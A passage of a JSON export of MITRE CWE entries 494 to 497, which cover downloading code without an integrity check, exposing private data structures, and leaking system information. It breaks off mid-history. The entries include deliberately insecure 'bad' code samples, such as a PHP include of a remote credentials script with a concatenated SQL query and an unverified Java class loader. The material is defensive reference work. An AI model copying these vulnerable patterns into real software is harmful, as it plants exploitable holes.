data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Non-final Public Field","attr":{"@_Date":"2008-04-11"}}}},"494":{"attr":{"@_ID":"494","@_Name":"Download of Code Without Integrity Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.","Extended_Description":"An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"79","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","Other"],"Note":"Executing untrusted code could compromise the control flow of the program. The untrusted code could execute attacker-controlled commands, read or modify sensitive resources, or prevent the software from functioning correctly for legitimate users."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7.4"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is typically required to find the behavior that triggers the download of code, and to determine whether integrity-checking methods are in use."]},"Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and also sniff the network connection. Trigger features related to product updates or plugin installation, which is likely to force a code download. Monitor when files are downloaded and separately executed, or if they are otherwise read back into the process. Look for evidence of cryptographic library calls that use integrity checking."]}}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-42"},"Phase":"Implementation","Description":"Perform proper forward and reverse DNS lookups to detect DNS spoofing.","Effectiveness_Notes":"This is only a partial solution since it will not prevent your code from being modified on the hosting site or in transit."},{"Phase":["Architecture and Design","Operation"],"Description":{"xhtml:p":["Encrypt the code with a reliable encryption scheme before transmitting.","This will only be a partial solution, since it will not detect DNS spoofing and it will not prevent your code from being modified on the hosting site."]}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Speficially, it may be helpful to use tools or frameworks to perform integrity checking on the transmitted code."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["When providing the code that is to be downloaded, such as for automatic updates of the software, then use cryptographic signatures for the code and modify the download clients to verify the signatures. Ensure that the implementation does not contain CWE-295, CWE-320, CWE-347, and related weaknesses.","Use code signing technologies such as Authenticode. See references [REF-454] [REF-455] [REF-456]."]}}}},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example loads an external class from a local subdirectory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"URL[] classURLs= new URL[]{};URLClassLoader loader = new URLClassLoader(classURLs);Class loadedClass = Class.forName(\\"loadMe\\", true, loader);","xhtml:div":{"#text":"new URL(\\"file:subdir/\\")","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}},"Body_Text":"This code does not ensure that the class loaded is the intended one, for example by verifying the class\'s checksum. An attacker may be able to modify the class file to execute malicious code."},{"Intro_Text":"This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username,$password){}","xhtml:i":"//assume the password is already encrypted, avoiding CWE-312","xhtml:br":["","",""],"xhtml:div":{"#text":"include(\\"http://external.example.com/dbInfo.php\\");mysql_connect($dbhost, $dbuser, $dbpass) or die (\'Error connecting to mysql\');mysql_select_db($dbname);$query = \'Select * from users where username=\'.$username.\' And password=\'.$password;$result = mysql_query($query);if(mysql_numrows($result) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""],"xhtml:i":"//dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available","xhtml:div":[{"#text":"mysql_close();return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"mysql_close();return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}},"Body_Text":["This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow themself to access the application without a real user account.","This example is also vulnerable to an Adversary-in-the-Middle AITM (CWE-300) attack."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9534","Description":"Satellite phone does not validate its firmware image.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9534"},{"Reference":"CVE-2021-22909","Description":"Chain: router\'s firmware update procedure uses curl with \\"-k\\" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909"},{"Reference":"CVE-2008-3438","Description":"OS does not verify authenticity of its own updates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3438"},{"Reference":"CVE-2008-3324","Description":"online poker client does not verify authenticity of its own updates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3324"},{"Reference":"CVE-2001-1125","Description":"anti-virus product does not verify automatic updates for itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1125"},{"Reference":"CVE-2002-0671","Description":"VOIP phone downloads applications from web sites without verifying integrity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0671"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Invoking untrusted mobile code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP27","Entry_Name":"Tainted input to environment"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"184"}},{"attr":{"@_CAPEC_ID":"185"}},{"attr":{"@_CAPEC_ID":"186"}},{"attr":{"@_CAPEC_ID":"187"}},{"attr":{"@_CAPEC_ID":"533"}},{"attr":{"@_CAPEC_ID":"657"}},{"attr":{"@_CAPEC_ID":"662"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-454"}},{"attr":{"@_External_Reference_ID":"REF-455"}},{"attr":{"@_External_Reference_ID":"REF-456"}},{"attr":{"@_External_Reference_ID":"REF-457"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 18: The Sins of Mobile Code.&#34; Page 267"}},{"attr":{"@_External_Reference_ID":"REF-459"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Other_Notes, Potential_Mitigations, References, Relationships, Research_Gaps, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Mobile Code: Invoking Untrusted Mobile Code","attr":{"@_Date":"2008-04-11"}},{"#text":"Download of Untrusted Mobile Code Without Integrity Check","attr":{"@_Date":"2009-01-12"}}]}},"495":{"attr":{"@_ID":"495","@_Name":"Private Data Structure Returned From A Public Method","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The contents of the data structure can be modified from outside the intended scope."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Declare the method private."},{"Phase":"Implementation","Description":"Clone the member data and keep an unmodified version of the data private to the object."},{"Phase":"Implementation","Description":"Use public setter methods that govern how a private member can be modified."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Here, a public method in a Java class returns a reference to a private array. Given that arrays in Java are mutable, any modifications made to the returned reference would be reflected in the original private array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private String[] colors;public String[] getColors() {}","xhtml:br":"","xhtml:div":{"#text":"return colors;","attr":{"@_style":"margin-left:10px;"}}}}},{"Intro_Text":"In this example, the Color class defines functions that return non-const references to private members (an array type and an integer type), which are then arbitrarily altered from outside the control of the class.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class Color{};int main (){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"int[2] colorArray;int colorValue;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Color () : colorArray { 1, 2 }, colorValue (3) { };int[2] &amp; fa () { return colorArray; }int &amp; fv () { return colorValue; }","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":["// return reference to private array","// return reference to private integer"]}]},{"#text":"Color c;c.fa () [1] = 42;c.fv () = 42;return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":["// modifies private array element","// modifies private int"]}]}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Private Array-Typed Field Returned From A Public Method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Private Array-Typed Field Returned From A Public Method","attr":{"@_Date":"2019-01-03"}}}},"496":{"attr":{"@_ID":"496","@_Name":"Public Data Assigned to Private Array-Typed Field","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Assigning public data to a private array is equivalent to giving public access to the array.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The contents of the array can be modified from outside the intended scope."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not allow objects to modify private members of a class."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, the setRoles() method assigns a publically-controllable array to a private field, thus allowing the caller to modify the private array directly by virtue of the fact that arrays in Java are mutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private String[] userRoles;public void setUserRoles(String[] userRoles) {}","xhtml:br":"","xhtml:div":{"#text":"this.userRoles = userRoles;","attr":{"@_style":"margin-left:10px;"}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Public Data Assigned to Private Array-Typed Field"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"497":{"attr":{"@_ID":"497","@_Name":"Exposure of Sensitive System Information to an Unauthorized Control Sphere","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the application does.","Extended_Description":{"xhtml:p":["Network-based software, such as web applications, often runs on top of an operating system or similar environment.  When the application communicates with outside parties, details about the underlying system are expected to remain hidden, such as path names for data files, other OS users, installed packages, the application environment, etc. This system information may be provided by the application itself, or buried within diagnostic or debugging messages. Debugging information helps an adversary learn about the system and form an attack plan.","An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. Using other weaknesses, an attacker could cause errors to occur; the response to these errors can reveal detailed system information, along with other impacts.  An attacker can use messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. An application may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Production applications should never use methods that generate internal details such as stack traces and error messages unless that information is directly committed to a log that is not viewable by the end user. All error message text should be HTML entity encoded before being written to the log file to protect against potential cross-site scripting attacks against the viewer of the logs"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code prints the path environment variable to the standard error stream:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* path = getenv(\\"PATH\\");...sprintf(stderr, \\"cannot find exe on path %s\\\\n\\", path);","xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-68"},"Intro_Text":"This code prints all of the running processes belonging to the current user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = getCurrentUser();$command = \'ps aux | grep \' . $userName;system($command);","xhtml:br":["","","",""],"xhtml:i":"//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78)"}},"Body_Text":"If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users."},{"Intro_Text":"The following code prints an exception to the standard error stream:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Exception e) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"e.printStackTrace();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"try {} catch (Exception e) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"Console.Writeline(e);","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program."},{"Intro_Text":"The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"string cs=\\"database=northwind; server=mySQLServer...\\";SqlConnection conn=new SqlConnection(cs);...Console.Writeline(cs);","xhtml:br":["","",""]}},"Body_Text":"Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system is vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"System Information Leak"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"170"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, 